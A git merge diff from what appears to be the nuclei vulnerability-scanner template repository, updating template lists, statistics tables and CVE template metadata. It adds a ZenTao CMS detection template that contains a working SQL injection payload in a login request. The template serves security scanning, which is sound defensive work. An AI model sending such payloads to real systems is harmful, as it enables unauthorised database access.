Merge branch 'master' into patch-1
commit
86d7f1b84a
|
@ -1,25 +1,33 @@
|
|||
cves/2017/CVE-2017-11586.yaml
|
||||
cves/2017/CVE-2017-11629.yaml
|
||||
cves/2019/CVE-2019-14530.yaml
|
||||
cves/2020/CVE-2020-17526.yaml
|
||||
cves/2020/CVE-2020-5191.yaml
|
||||
cves/2020/CVE-2020-5192.yaml
|
||||
cves/2022/CVE-2022-2383.yaml
|
||||
cves/2022/CVE-2022-32770.yaml
|
||||
cves/2022/CVE-2022-32771.yaml
|
||||
cves/2022/CVE-2022-32772.yaml
|
||||
cves/2022/CVE-2022-34576.yaml
|
||||
exposed-panels/adobe/aem-crx-package-manager.yaml
|
||||
exposed-panels/adobe/aem-sling-login.yaml
|
||||
exposed-panels/icc-pro-login.yaml
|
||||
misconfiguration/aem/aem-crx-browser.yaml
|
||||
misconfiguration/aem/aem-crx-namespace.yaml
|
||||
misconfiguration/aem/aem-crx-search.yaml
|
||||
misconfiguration/aem/aem-disk-usage.yaml
|
||||
misconfiguration/aem/aem-explorer-nodetypes.yaml
|
||||
misconfiguration/aem/aem-external-link-checker.yaml
|
||||
misconfiguration/aem/aem-misc-admin.yaml
|
||||
misconfiguration/aem/aem-offloading-browser.yaml
|
||||
misconfiguration/aem/aem-security-users.yaml
|
||||
misconfiguration/aem/aem-sling-userinfo.yaml
|
||||
takeovers/uservoice-takeover.yaml
|
||||
cnvd/2022/CNVD-2022-42853.yaml
|
||||
cves/2014/CVE-2014-8676.yaml
|
||||
cves/2015/CVE-2015-7245.yaml
|
||||
cves/2018/CVE-2018-16139.yaml
|
||||
cves/2020/CVE-2020-13258.yaml
|
||||
cves/2021/CVE-2021-35380.yaml
|
||||
cves/2021/CVE-2021-42663.yaml
|
||||
cves/2021/CVE-2021-42667.yaml
|
||||
cves/2022/CVE-2022-2376.yaml
|
||||
cves/2022/CVE-2022-23854.yaml
|
||||
cves/2022/CVE-2022-29004.yaml
|
||||
cves/2022/CVE-2022-29005.yaml
|
||||
cves/2022/CVE-2022-31474.yaml
|
||||
cves/2022/CVE-2022-35405.yaml
|
||||
cves/2022/CVE-2022-36642.yaml
|
||||
cves/2022/CVE-2022-37299.yaml
|
||||
default-logins/3com/3com-nj2000-default-login.yaml
|
||||
exposed-panels/appsmith-web-login.yaml
|
||||
exposed-panels/corebos-panel.yaml
|
||||
exposed-panels/cvent-panel-detect.yaml
|
||||
exposed-panels/omniampx-panel.yaml
|
||||
exposed-panels/v2924-admin-panel.yaml
|
||||
exposures/logs/redis-exception-error.yaml
|
||||
exposures/logs/webalizer-xtended-stats.yaml
|
||||
misconfiguration/aws-xray-application.yaml
|
||||
misconfiguration/corebos-htaccess.yaml
|
||||
misconfiguration/ec2-instance-information.yaml
|
||||
misconfiguration/graphql/graphql-playground.yaml
|
||||
misconfiguration/hivequeue-agent.yaml
|
||||
misconfiguration/server-status.yaml
|
||||
technologies/jhipster-detect.yaml
|
||||
technologies/openssl-detect.yaml
|
||||
vulnerabilities/videoxpert-lfi.yaml
|
||||
|
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1388 | daffainfo | 630 | cves | 1363 | info | 1450 | http | 3773 |
|
||||
| panel | 642 | dhiyaneshdk | 558 | exposed-panels | 649 | high | 974 | file | 76 |
|
||||
| edb | 548 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
|
||||
| lfi | 496 | pdteam | 269 | technologies | 278 | critical | 469 | dns | 17 |
|
||||
| xss | 472 | geeknik | 187 | exposures | 273 | low | 219 | | |
|
||||
| wordpress | 415 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
|
||||
| exposure | 394 | 0x_akoko | 158 | misconfiguration | 217 | | | | |
|
||||
| cve2021 | 343 | princechaddha | 150 | workflows | 189 | | | | |
|
||||
| rce | 335 | pussycat0x | 133 | default-logins | 102 | | | | |
|
||||
| wp-plugin | 312 | ritikchaddha | 130 | file | 76 | | | | |
|
||||
| cve | 1414 | daffainfo | 630 | cves | 1389 | info | 1463 | http | 3823 |
|
||||
| panel | 649 | dhiyaneshdk | 577 | exposed-panels | 656 | high | 1000 | file | 76 |
|
||||
| edb | 557 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
|
||||
| lfi | 500 | pdteam | 269 | technologies | 280 | critical | 475 | dns | 17 |
|
||||
| xss | 486 | geeknik | 187 | exposures | 273 | low | 221 | | |
|
||||
| wordpress | 417 | dwisiswant0 | 169 | misconfiguration | 231 | unknown | 10 | | |
|
||||
| exposure | 404 | 0x_akoko | 162 | token-spray | 230 | | | | |
|
||||
| cve2021 | 350 | princechaddha | 150 | workflows | 189 | | | | |
|
||||
| rce | 335 | ritikchaddha | 135 | default-logins | 102 | | | | |
|
||||
| wp-plugin | 314 | pussycat0x | 133 | file | 76 | | | | |
|
||||
|
||||
**294 directories, 4145 files**.
|
||||
**295 directories, 4195 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
3751
TEMPLATES-STATS.md
3751
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1388 | daffainfo | 630 | cves | 1363 | info | 1450 | http | 3773 |
|
||||
| panel | 642 | dhiyaneshdk | 558 | exposed-panels | 649 | high | 974 | file | 76 |
|
||||
| edb | 548 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
|
||||
| lfi | 496 | pdteam | 269 | technologies | 278 | critical | 469 | dns | 17 |
|
||||
| xss | 472 | geeknik | 187 | exposures | 273 | low | 219 | | |
|
||||
| wordpress | 415 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
|
||||
| exposure | 394 | 0x_akoko | 158 | misconfiguration | 217 | | | | |
|
||||
| cve2021 | 343 | princechaddha | 150 | workflows | 189 | | | | |
|
||||
| rce | 335 | pussycat0x | 133 | default-logins | 102 | | | | |
|
||||
| wp-plugin | 312 | ritikchaddha | 130 | file | 76 | | | | |
|
||||
| cve | 1414 | daffainfo | 630 | cves | 1389 | info | 1463 | http | 3823 |
|
||||
| panel | 649 | dhiyaneshdk | 577 | exposed-panels | 656 | high | 1000 | file | 76 |
|
||||
| edb | 557 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
|
||||
| lfi | 500 | pdteam | 269 | technologies | 280 | critical | 475 | dns | 17 |
|
||||
| xss | 486 | geeknik | 187 | exposures | 273 | low | 221 | | |
|
||||
| wordpress | 417 | dwisiswant0 | 169 | misconfiguration | 231 | unknown | 10 | | |
|
||||
| exposure | 404 | 0x_akoko | 162 | token-spray | 230 | | | | |
|
||||
| cve2021 | 350 | princechaddha | 150 | workflows | 189 | | | | |
|
||||
| rce | 335 | ritikchaddha | 135 | default-logins | 102 | | | | |
|
||||
| wp-plugin | 314 | pussycat0x | 133 | file | 76 | | | | |
|
||||
|
|
|
@ -13,7 +13,7 @@ info:
|
|||
cvss-score: 9.9
|
||||
cwe-id: CWE-434
|
||||
remediation: Pan Wei has released an update to resolve this vulnerability.
|
||||
tags: pan,micro,cnvd,cnvd2021
|
||||
tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -0,0 +1,35 @@
|
|||
id: CNVD-2022-42853
|
||||
|
||||
info:
|
||||
name: ZenTao CMS - SQL Injection
|
||||
author: ling
|
||||
severity: high
|
||||
description: |
|
||||
Zen Tao has a SQL injection vulnerability. Attackers can exploit the vulnerability to obtain sensitive database information.
|
||||
reference:
|
||||
- https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"zentao"
|
||||
fofa-query: "Zentao"
|
||||
tags: cnvd,cnvd2022,zentao,sqli
|
||||
|
||||
variables:
|
||||
num: "999999999"
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /zentao/user-login.html HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{BaseURL}}/zentao/user-login.html
|
||||
|
||||
account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'c8c605999f3d8352d7bb792cf3fdb25'
|
|
@ -10,7 +10,7 @@ info:
|
|||
- https://www.exploit-db.com/exploits/5194
|
||||
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-1059
|
||||
- http://secunia.com/advisories/29099
|
||||
- https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2008-1061
|
||||
|
||||
info:
|
||||
name: Wordpress Plugin Sniplets 1.2.2 - Cross-Site Scripting
|
||||
name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: |
|
||||
Multiple cross-site scripting (XSS) vulnerabilities in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) text parameter to (a) warning.php, (b) notice.php, and (c) inset.php in view/sniplets/, and possibly (d) modules/execute.php; the (2) url parameter to (e) view/admin/submenu.php; and the (3) page parameter to (f) view/admin/pager.php.
|
||||
WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/5194
|
||||
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
|
||||
|
@ -35,3 +35,6 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -7,8 +7,8 @@ info:
|
|||
description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/35945
|
||||
- https://www.cvedetails.com/cve/CVE-2011-2744
|
||||
- http://www.openwall.com/lists/oss-security/2011/07/13/6
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2011-2744
|
||||
- http://web.archive.org/web/20140723162411/http://secunia.com/advisories/45184/
|
||||
classification:
|
||||
cve-id: CVE-2011-2744
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2011-4618
|
||||
|
||||
info:
|
||||
name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting
|
||||
name: Advanced Text Widget < 2.0.2 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2011-4624
|
||||
|
||||
info:
|
||||
name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting
|
||||
name: GRAND FlAGallery 1.57 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.
|
||||
|
|
|
@ -7,9 +7,9 @@ info:
|
|||
description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/36598
|
||||
- https://www.cvedetails.com/cve/CVE-2011-4804
|
||||
- http://web.archive.org/web/20140802122115/http://secunia.com/advisories/46844/
|
||||
- http://web.archive.org/web/20210121214308/https://www.securityfocus.com/bid/48944/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2011-4804
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2011-4804
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2011-4926
|
||||
|
||||
info:
|
||||
name: Adminimize 1.7.22 - Reflected Cross-Site Scripting
|
||||
name: Adminimize 1.7.22 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2011-5106
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting
|
||||
name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2011-5107
|
||||
|
||||
info:
|
||||
name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting
|
||||
name: Alert Before Your Post <= 0.1.1 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2011-5179
|
||||
|
||||
info:
|
||||
name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting
|
||||
name: Skysa App Bar 1.04 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2011-5181
|
||||
|
||||
info:
|
||||
name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting
|
||||
name: ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2011-5265
|
||||
|
||||
info:
|
||||
name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting
|
||||
name: Featurific For WordPress 1.6.2 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.
|
||||
|
|
|
@ -7,9 +7,9 @@ info:
|
|||
description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/108631/
|
||||
- https://www.cvedetails.com/cve/CVE-2012-0896
|
||||
- http://web.archive.org/web/20140804110141/http://secunia.com/advisories/47529/
|
||||
- http://plugins.trac.wordpress.org/changeset/488883/count-per-day
|
||||
- https://https://nvd.nist.gov/vuln/detail/CVE-2012-0896
|
||||
classification:
|
||||
cve-id: CVE-2012-0896
|
||||
metadata:
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2012-0901
|
||||
|
||||
info:
|
||||
name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting
|
||||
name: YouSayToo auto-publishing 1.0 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2012-1835
|
||||
|
||||
info:
|
||||
name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting
|
||||
name: WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2012-2371
|
||||
|
||||
info:
|
||||
name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting
|
||||
name: WP-FaceThumb 0.1 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2012-4242
|
||||
|
||||
info:
|
||||
name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting
|
||||
name: WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2012-4273
|
||||
|
||||
info:
|
||||
name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting
|
||||
name: 2 Click Socialmedia Buttons < 0.34 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2012-4768
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting
|
||||
name: WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2012-4889
|
||||
|
||||
info:
|
||||
name: ManageEngine Firewall Analyzer 7.2 - Reflected Cross Site Scripting
|
||||
name: ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2012-5913
|
||||
|
||||
info:
|
||||
name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting
|
||||
name: WordPress Integrator 1.32 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2013-2287
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting
|
||||
name: WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2013-3526
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting
|
||||
name: WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2013-4117
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting
|
||||
name: WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2013-4625
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting
|
||||
name: WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
|
||||
|
|
|
@ -8,7 +8,6 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/26955
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2013-5979
|
||||
- https://www.cvedetails.com/cve/CVE-2013-5979
|
||||
- https://bugs.launchpad.net/xibo/+bug/1093967
|
||||
classification:
|
||||
cve-id: CVE-2013-5979
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
cve-id: CVE-2013-6281
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet
|
||||
google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet
|
||||
verified: "true"
|
||||
tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin
|
||||
|
||||
|
|
|
@ -7,7 +7,6 @@ info:
|
|||
description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/30865
|
||||
- https://www.cvedetails.com/cve/CVE-2014-10037
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-10037
|
||||
- http://www.exploit-db.com/exploits/30865
|
||||
classification:
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2014-4513
|
||||
|
||||
info:
|
||||
name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting
|
||||
name: ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2014-4535
|
||||
|
||||
info:
|
||||
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting
|
||||
name: Import Legacy Media <= 0.1 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.
|
||||
|
@ -14,7 +14,7 @@ info:
|
|||
cvss-score: 6.1
|
||||
cve-id: CVE-2014-4535
|
||||
cwe-id: CWE-79
|
||||
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss
|
||||
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2014-4536
|
||||
|
||||
info:
|
||||
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting
|
||||
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.
|
||||
|
@ -17,7 +17,7 @@ info:
|
|||
cwe-id: CWE-79
|
||||
metadata:
|
||||
google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/"
|
||||
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss
|
||||
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2014-4539
|
||||
|
||||
info:
|
||||
name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting
|
||||
name: Movies <= 0.6 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.
|
||||
|
@ -14,7 +14,7 @@ info:
|
|||
cvss-score: 6.1
|
||||
cve-id: CVE-2014-4539
|
||||
cwe-id: CWE-79
|
||||
tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014
|
||||
tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2014-4544
|
||||
|
||||
info:
|
||||
name: Podcast Channels < 0.28 - Unauthenticated Reflected Cross-Site Scripting
|
||||
name: Podcast Channels < 0.28 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability.
|
||||
|
@ -14,7 +14,7 @@ info:
|
|||
cvss-score: 6.1
|
||||
cve-id: CVE-2014-4544
|
||||
cwe-id: CWE-79
|
||||
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss
|
||||
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2014-4550
|
||||
|
||||
info:
|
||||
name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected Cross-Site Scripting
|
||||
name: Shortcode Ninja <= 1.4 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter.
|
||||
|
@ -16,7 +16,7 @@ info:
|
|||
cwe-id: CWE-79
|
||||
metadata:
|
||||
google-query: inurl:"/wp-content/plugins/shortcode-ninja"
|
||||
tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014
|
||||
tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2014-4558
|
||||
|
||||
info:
|
||||
name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected Cross-Site Scripting
|
||||
name: WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter.
|
||||
|
@ -14,7 +14,7 @@ info:
|
|||
